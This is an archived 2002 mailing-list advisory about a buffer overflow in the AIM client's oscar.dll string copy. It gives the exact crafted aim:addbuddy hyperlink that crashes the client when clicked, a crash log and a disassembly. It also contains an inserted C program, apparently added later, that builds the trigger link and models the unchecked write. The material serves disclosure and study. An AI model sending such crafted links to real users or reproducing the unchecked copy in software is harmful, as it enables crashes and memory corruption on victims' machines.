Vulnerability Development mailing list archives
AIM including the beta 4.8.2646 Local/Remote Buffer Overflow
From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Thu, 7 Mar 2002 07:23:25 -0500
.--------.
/ Bugs   \
+-----------------------------------------------------------------------.
: Affected : All versions of AIM, including the beta 4.8.2646
: Type     : Local/Remote Buffer Overflow
: Date     : 29-02-2002
: Author   : NtWaK0 & Recon @ www.SafeHack.com
+-----------------------------------------------------------------------.

We think this has not been reported before; nothing was found publicly
about it.

+------------------.
: Crash of AIM Client \
+--------------------`--------------------------------------------------.

+-----------.
: Disclaimer \
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on
experiments, though it may be false. The opinions expressed in this
advisory and program are my own and NOT those of any company. In fact,
I do not work for anyone at the present time.

This material is presented for informational and entertainment purposes
only, and to satisfy the curious. Any activities described in this file
which involve vandalism, theft, or any other illegal activities are
recounted from third-party conversations. I do not condone or encourage
vandalism or theft. I do not accept any liability for anything anyone
does with this information.
Remember: Use a computer in ways that ensure respect for your fellows.

+-------------.
: Brief History \
+---------------`-------------------------------------------------------.
If you are running any version of AIM (AOL Instant Messenger) you are
affected by this crash; the vendor has been informed.

AOL's Instant Messenger client (AIM) contains a buffer overflow in the
file oscar.dll. Instant Messenger lets AOL users send short messages to
each other. The overflow is in the string-copy routine o_strncpy in
oscar.dll; the faulting instruction is a byte store through the al
register (mov [edi],al).

+---------------------------+
: Test OS / Applications    :
+---------------------------+
Tested on all versions of the Microsoft Windows family of OS with the
latest beta version of AIM, 4.8.2646.

+-----------.
: The Problem \
+-------------`---------------------------------------------------------.
Normally I do not use AIM, but a friend of mine, "Recon", told me about a
strange problem he found. Since I am curious, I installed AIM and did
some tests to find out what was going on. Again, thanks Recon.

The buffer overflow happens if you send a specially crafted message to
an AIM user.

To see the buffer overflow, do the following steps:
1- Make sure you have AIM 4.8.2646 installed.
2- Open a new IM window and click the link button to set up a hyperlink
   for your buddy.
3- Input the exact text into the link:
   aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,
   12345678,12345678,12345678,12345678,12345678,12345678&groupname=
   12345678,12345678,12345678,12345678,12345678,12345678,12345678
   ,12345678,12345678,12345678,
4- The text can be anything as long as it meets the format of 8
   characters for each word to add as a screenname and a groupname;
   there should be 11 instances for the screenname and 10 for the
   groupname.
5- A memory dump occurs as soon as the hyperlink is clicked by either
   side (you or your buddy).
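As an added example (it is not the advisory's or AOL's code), the following C program builds the hyperlink from the 8-character rule above, reports the byte length of each field the client has to copy when the link is clicked, and models the copy loop shown in the o_strncpy listing that follows: the destination bound is checked once per character at the top of the loop, but a two-byte character is stored with two separate byte writes and the second write has no check of its own, so a character that straddles the end of the destination writes past it. A version that refuses to split a character is shown beside it. The lead-byte test (bytes >= 0x81), the 16-byte destination, the constructed input and the function names are assumptions made for the model; the advisory does not say how large the real destination is or what the caller passes.

```c
/* Reconstruction for illustration; not the advisory's or AOL's code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME "12345678"   /* the 8-character token from the repro steps */

/* Append 'count' copies of NAME, comma separated, to out at *pos.
 * trailing != 0 also emits a comma after the last name (the advisory's
 * groupname list ends with one).  Returns 0, or -1 if out is too small. */
static int append_names(char *out, size_t outsz, size_t *pos, int count, int trailing)
{
    for (int i = 0; i < count; i++) {
        const char *sep = (i + 1 < count || trailing) ? "," : "";
        int n = snprintf(out + *pos, outsz - *pos, "%s%s", NAME, sep);
        if (n < 0 || (size_t)n >= outsz - *pos)
            return -1;
        *pos += (size_t)n;
    }
    return 0;
}

/* Build the hyperlink with n_screen screen names and n_group group names
 * (the advisory uses 11 and 10).  Returns 0, or -1 if out is too small. */
int build_addbuddy_url(char *out, size_t outsz, int n_screen, int n_group)
{
    int n = snprintf(out, outsz, "aim:addbuddy?screenname=");
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    size_t pos = (size_t)n;
    if (append_names(out, outsz, &pos, n_screen, 0) != 0)
        return -1;
    n = snprintf(out + pos, outsz - pos, "&groupname=");
    if (n < 0 || (size_t)n >= outsz - pos)
        return -1;
    pos += (size_t)n;
    return append_names(out, outsz, &pos, n_group, 1);
}

/* Byte length of the value of query parameter 'key' in url, i.e. how much
 * the client has to copy for that field.  -1 if the key is absent. */
long query_value_len(const char *url, const char *key)
{
    const char *q = strchr(url, '?');
    size_t klen = strlen(key);
    if (q == NULL)
        return -1;
    for (const char *p = q + 1;;) {
        const char *amp = strchr(p, '&');
        size_t plen = amp ? (size_t)(amp - p) : strlen(p);
        if (plen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=')
            return (long)(plen - klen - 1);
        if (amp == NULL)
            return -1;
        p = amp + 1;
    }
}

/* Build the trigger and return the byte length of one of its fields. */
long trigger_field_len(const char *key, int n_screen, int n_group)
{
    char url[1024];
    if (build_addbuddy_url(url, sizeof url, n_screen, n_group) != 0)
        return -1;
    return query_value_len(url, key);
}

/* Stand-in for the CharNextA test in the listing (assumption: bytes >= 0x81
 * start a two-byte character; the real code-page tables differ). */
static int is_lead_byte(unsigned char c) { return c >= 0x81; }

/* Model of the listed loop: 'd < end' (edi vs lpsz) is checked once per
 * character, but a two-byte character is stored as two byte writes and the
 * second one has no check.  Returns how many bytes landed at or past 'end'. */
long copy_unchecked_trail(char *dst, char *end, const char *src)
{
    char *d = dst;
    while (*src != '\0' && d < end) {
        if (is_lead_byte((unsigned char)src[0]) && src[1] != '\0') {
            *d++ = *src++;               /* lead byte: covered by the check */
            *d++ = *src++;               /* trail byte: may land on 'end'   */
        } else {
            *d++ = *src++;
        }
    }
    while (d < end)                      /* zero-fill tail, like the rep stos */
        *d++ = '\0';
    return d > end ? (long)(d - end) : 0;
}

/* Hardened form: copy a character only if all of it fits, and keep the
 * last destination byte for the terminator.  Always returns 0. */
long copy_checked(char *dst, char *end, const char *src)
{
    char *d = dst;
    while (*src != '\0' && d < end - 1) {
        size_t clen = (is_lead_byte((unsigned char)src[0]) && src[1] != '\0') ? 2 : 1;
        if ((size_t)(end - 1 - d) < clen)
            break;
        memcpy(d, src, clen);
        d += clen;
        src += clen;
    }
    while (d < end)
        *d++ = '\0';
    return 0;
}

#define DST_SIZE 16   /* assumed destination size for the demonstration */

/* Run a copy routine into DST_SIZE bytes followed by a canary byte that sits
 * inside the same array, so the overrun is observable without undefined
 * behaviour.  Returns bytes written past the destination (0 if the canary
 * survived). */
long demo_overrun(long (*copy)(char *, char *, const char *))
{
    unsigned char buf[DST_SIZE + 4];
    /* constructed input: 15 ASCII bytes, then a two-byte character whose
     * trail byte falls exactly on the boundary */
    const unsigned char src[] = { '1','2','3','4','5','6','7','8','9','0',
                                  '1','2','3','4','5', 0x81, 0x41, 0 };
    memset(buf, 0xAA, sizeof buf);
    long over = copy((char *)buf, (char *)buf + DST_SIZE, (const char *)src);
    return buf[DST_SIZE] != 0xAA ? over : 0;
}

int main(void)
{
    char url[1024];
    if (build_addbuddy_url(url, sizeof url, 11, 10) == 0)
        printf("%s\nscreenname field: %ld bytes, groupname field: %ld bytes\n",
               url, query_value_len(url, "screenname"), query_value_len(url, "groupname"));
    printf("listed loop model: %ld byte(s) past end\n", demo_overrun(copy_unchecked_trail));
    printf("per-character bound: %ld byte(s) past end\n", demo_overrun(copy_checked));
    return 0;
}
```

With the advisory's 11 and 10 tokens the screenname field is 98 bytes and the groupname field 90 bytes (the trailing comma counts); whether those sizes are what makes the real routine walk its destination pointer off the end is not something the page establishes, so the model only shows the one-byte straddle that the listing's structure permits.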
This was taken from the Dr. Watson log after the buffer overflow occurred:

function: o_strncpy
        1218b4f9 8b4508           mov     eax,[ebp+0x8]          ss:00c
        1218b4fc 3b450c           cmp     eax,[ebp+0xc]          ss:00c
        1218b4ff 7419             jz      LoadRendezvousString+0x39f6 (
        1218b501 8a06             mov     al,[esi]
        1218b503 8807             mov     [edi],al
        1218b505 47               inc     edi
        1218b506 ff4508           inc     dword ptr [ebp+0x8]    ss:00c
        1218b509 46               inc     esi
        1218b50a 43               inc     ebx
        1218b50b 8a06             mov     al,[esi]
FAULT ->1218b50d 8807             mov     [edi],al
        1218b50f 47               inc     edi
        1218b510 ff4508           inc     dword ptr [ebp+0x8]    ss:00c
        1218b513 46               inc     esi
        1218b514 43               inc     ebx
        1218b515 803e00           cmp     byte ptr [esi],0x0
        1218b518 75cf             jnz     LoadRendezvousString+0x3bc5 (
        1218b51a 8b4d0c           mov     ecx,[ebp+0xc]          ss:00c
        1218b51d 3bf9             cmp     edi,ecx
        1218b51f 7312             jnb     OscoreUseCurrentAcceleratorTable+
        1218b521 2bcf             sub     ecx,edi
        1218b523 33c0             xor     eax,eax

Below is a portion of the asm code for the file oscar.dll:
===============================================
.text:1218B4E9 loc_1218B4E9:                   ; CODE XREF: o_strncpy+61j
.text:1218B4E9                 cmp     edi, [ebp+lpsz]
.text:1218B4EC                 jnb     short loc_1218B533
.text:1218B4EE                 push    esi             ; lpsz
.text:1218B4EF                 call    ds:CharNextA
.text:1218B4F5                 cmp     eax, ebx
.text:1218B4F7                 jnz     short loc_1218B50B
.text:1218B4F9                 mov     eax, [ebp+arg_0]
.text:1218B4FC                 cmp     eax, [ebp+lpsz]
.text:1218B4FF                 jz      short loc_1218B51A
.text:1218B501                 mov     al, [esi]
.text:1218B503                 mov     [edi], al
.text:1218B505                 inc     edi
.text:1218B506                 inc     [ebp+arg_0]
.text:1218B509                 inc     esi
.text:1218B50A                 inc     ebx
===============================================
.text:1218B50B loc_1218B50B:                   ; CODE XREF: o_strncpy+40j
.text:1218B50B                 mov     al, [esi]
.text:1218B50D                 mov     [edi], al       ; <<<--- HERE IS THE P
.text:1218B50F                 inc     edi
.text:1218B510                 inc     [ebp+arg_0]
.text:1218B513                 inc     esi
.text:1218B514                 inc     ebx
.text:1218B515                 cmp     byte ptr [esi], 0
.text:1218B518                 jnz     short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A:                   ; CODE XREF: o_s
.text:1218B51A                                 ; o_strncpy+48j
.text:1218B51A                 mov     ecx, [ebp+lpsz]
.text:1218B51D                 cmp     edi, ecx
.text:1218B51F                 jnb     short loc_1218B533
.text:1218B521                 sub     ecx, edi
.text:1218B523                 xor     eax, eax
.text:1218B525                 mov     edx, ecx
.text:1218B527                 shr     ecx, 2
.text:1218B52A                 repe stosd
.text:1218B52C                 mov     ecx, edx
.text:1218B52E                 and     ecx, 3
.text:1218B531                 repe stosb
.text:1218B533
==================================================

Here are the stack variables:
===========================
00000000 s       db 4 dup(?)
00000004 r       db 4 dup(?)
00000008 arg_0   dd ?
0000000C lpsz    dd ?            ; offset (FFFFFFFF)
00000010 arg_8   dd ?

In the listing, the destination pointer is compared against the end
(cmp edi, [ebp+lpsz] at 1218B4E9) only at the top of the loop; the store
at 1218B50D, which is the one that faults in the Dr. Watson log, is also
reached by falling through from the first store at 1218B503 without the
destination being checked again.

This issue has not been tested on third-party software that supports
the OSCAR protocol.

+------------.
: The Solution \
+--------------`--------------------------------------------------------.
We could not locate an AIM email address to send this issue to.
+-----------------------------------------------------------------------.
________________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe, and
buried 20 feet under the ground in a secret location... and I'm not even
too sure about that one" -- Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good   www.SafeHack.com  |  Je Pense, Donc Je Suis   \(|)/
I know I ain't perfect, but I'm 99 point 9 percent :)             --(")--
RFCs are meant to be read and followed... :)                        /`\
NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you on a cybernetic
ride. Are you connected to the right cybernet? If you are, finally you
are connected to my brain.
________________________________________________________________________
-=- Use a computer in ways that ensure respect for your fellows -=-
Current thread:
- AIM including the beta 4.8.2646 Local/Remote Buffer Overflow  Adonis.No.Spam (Mar 07)
- Re: AIM including the beta 4.8.2646 Local/Remote Buffer Overflow  Douglas Pichardo (Mar 08)
- <Possible follow-ups>
- RE: AIM including the beta 4.8.2646 Local/Remote Buffer Overflow  John Adair (Mar 07)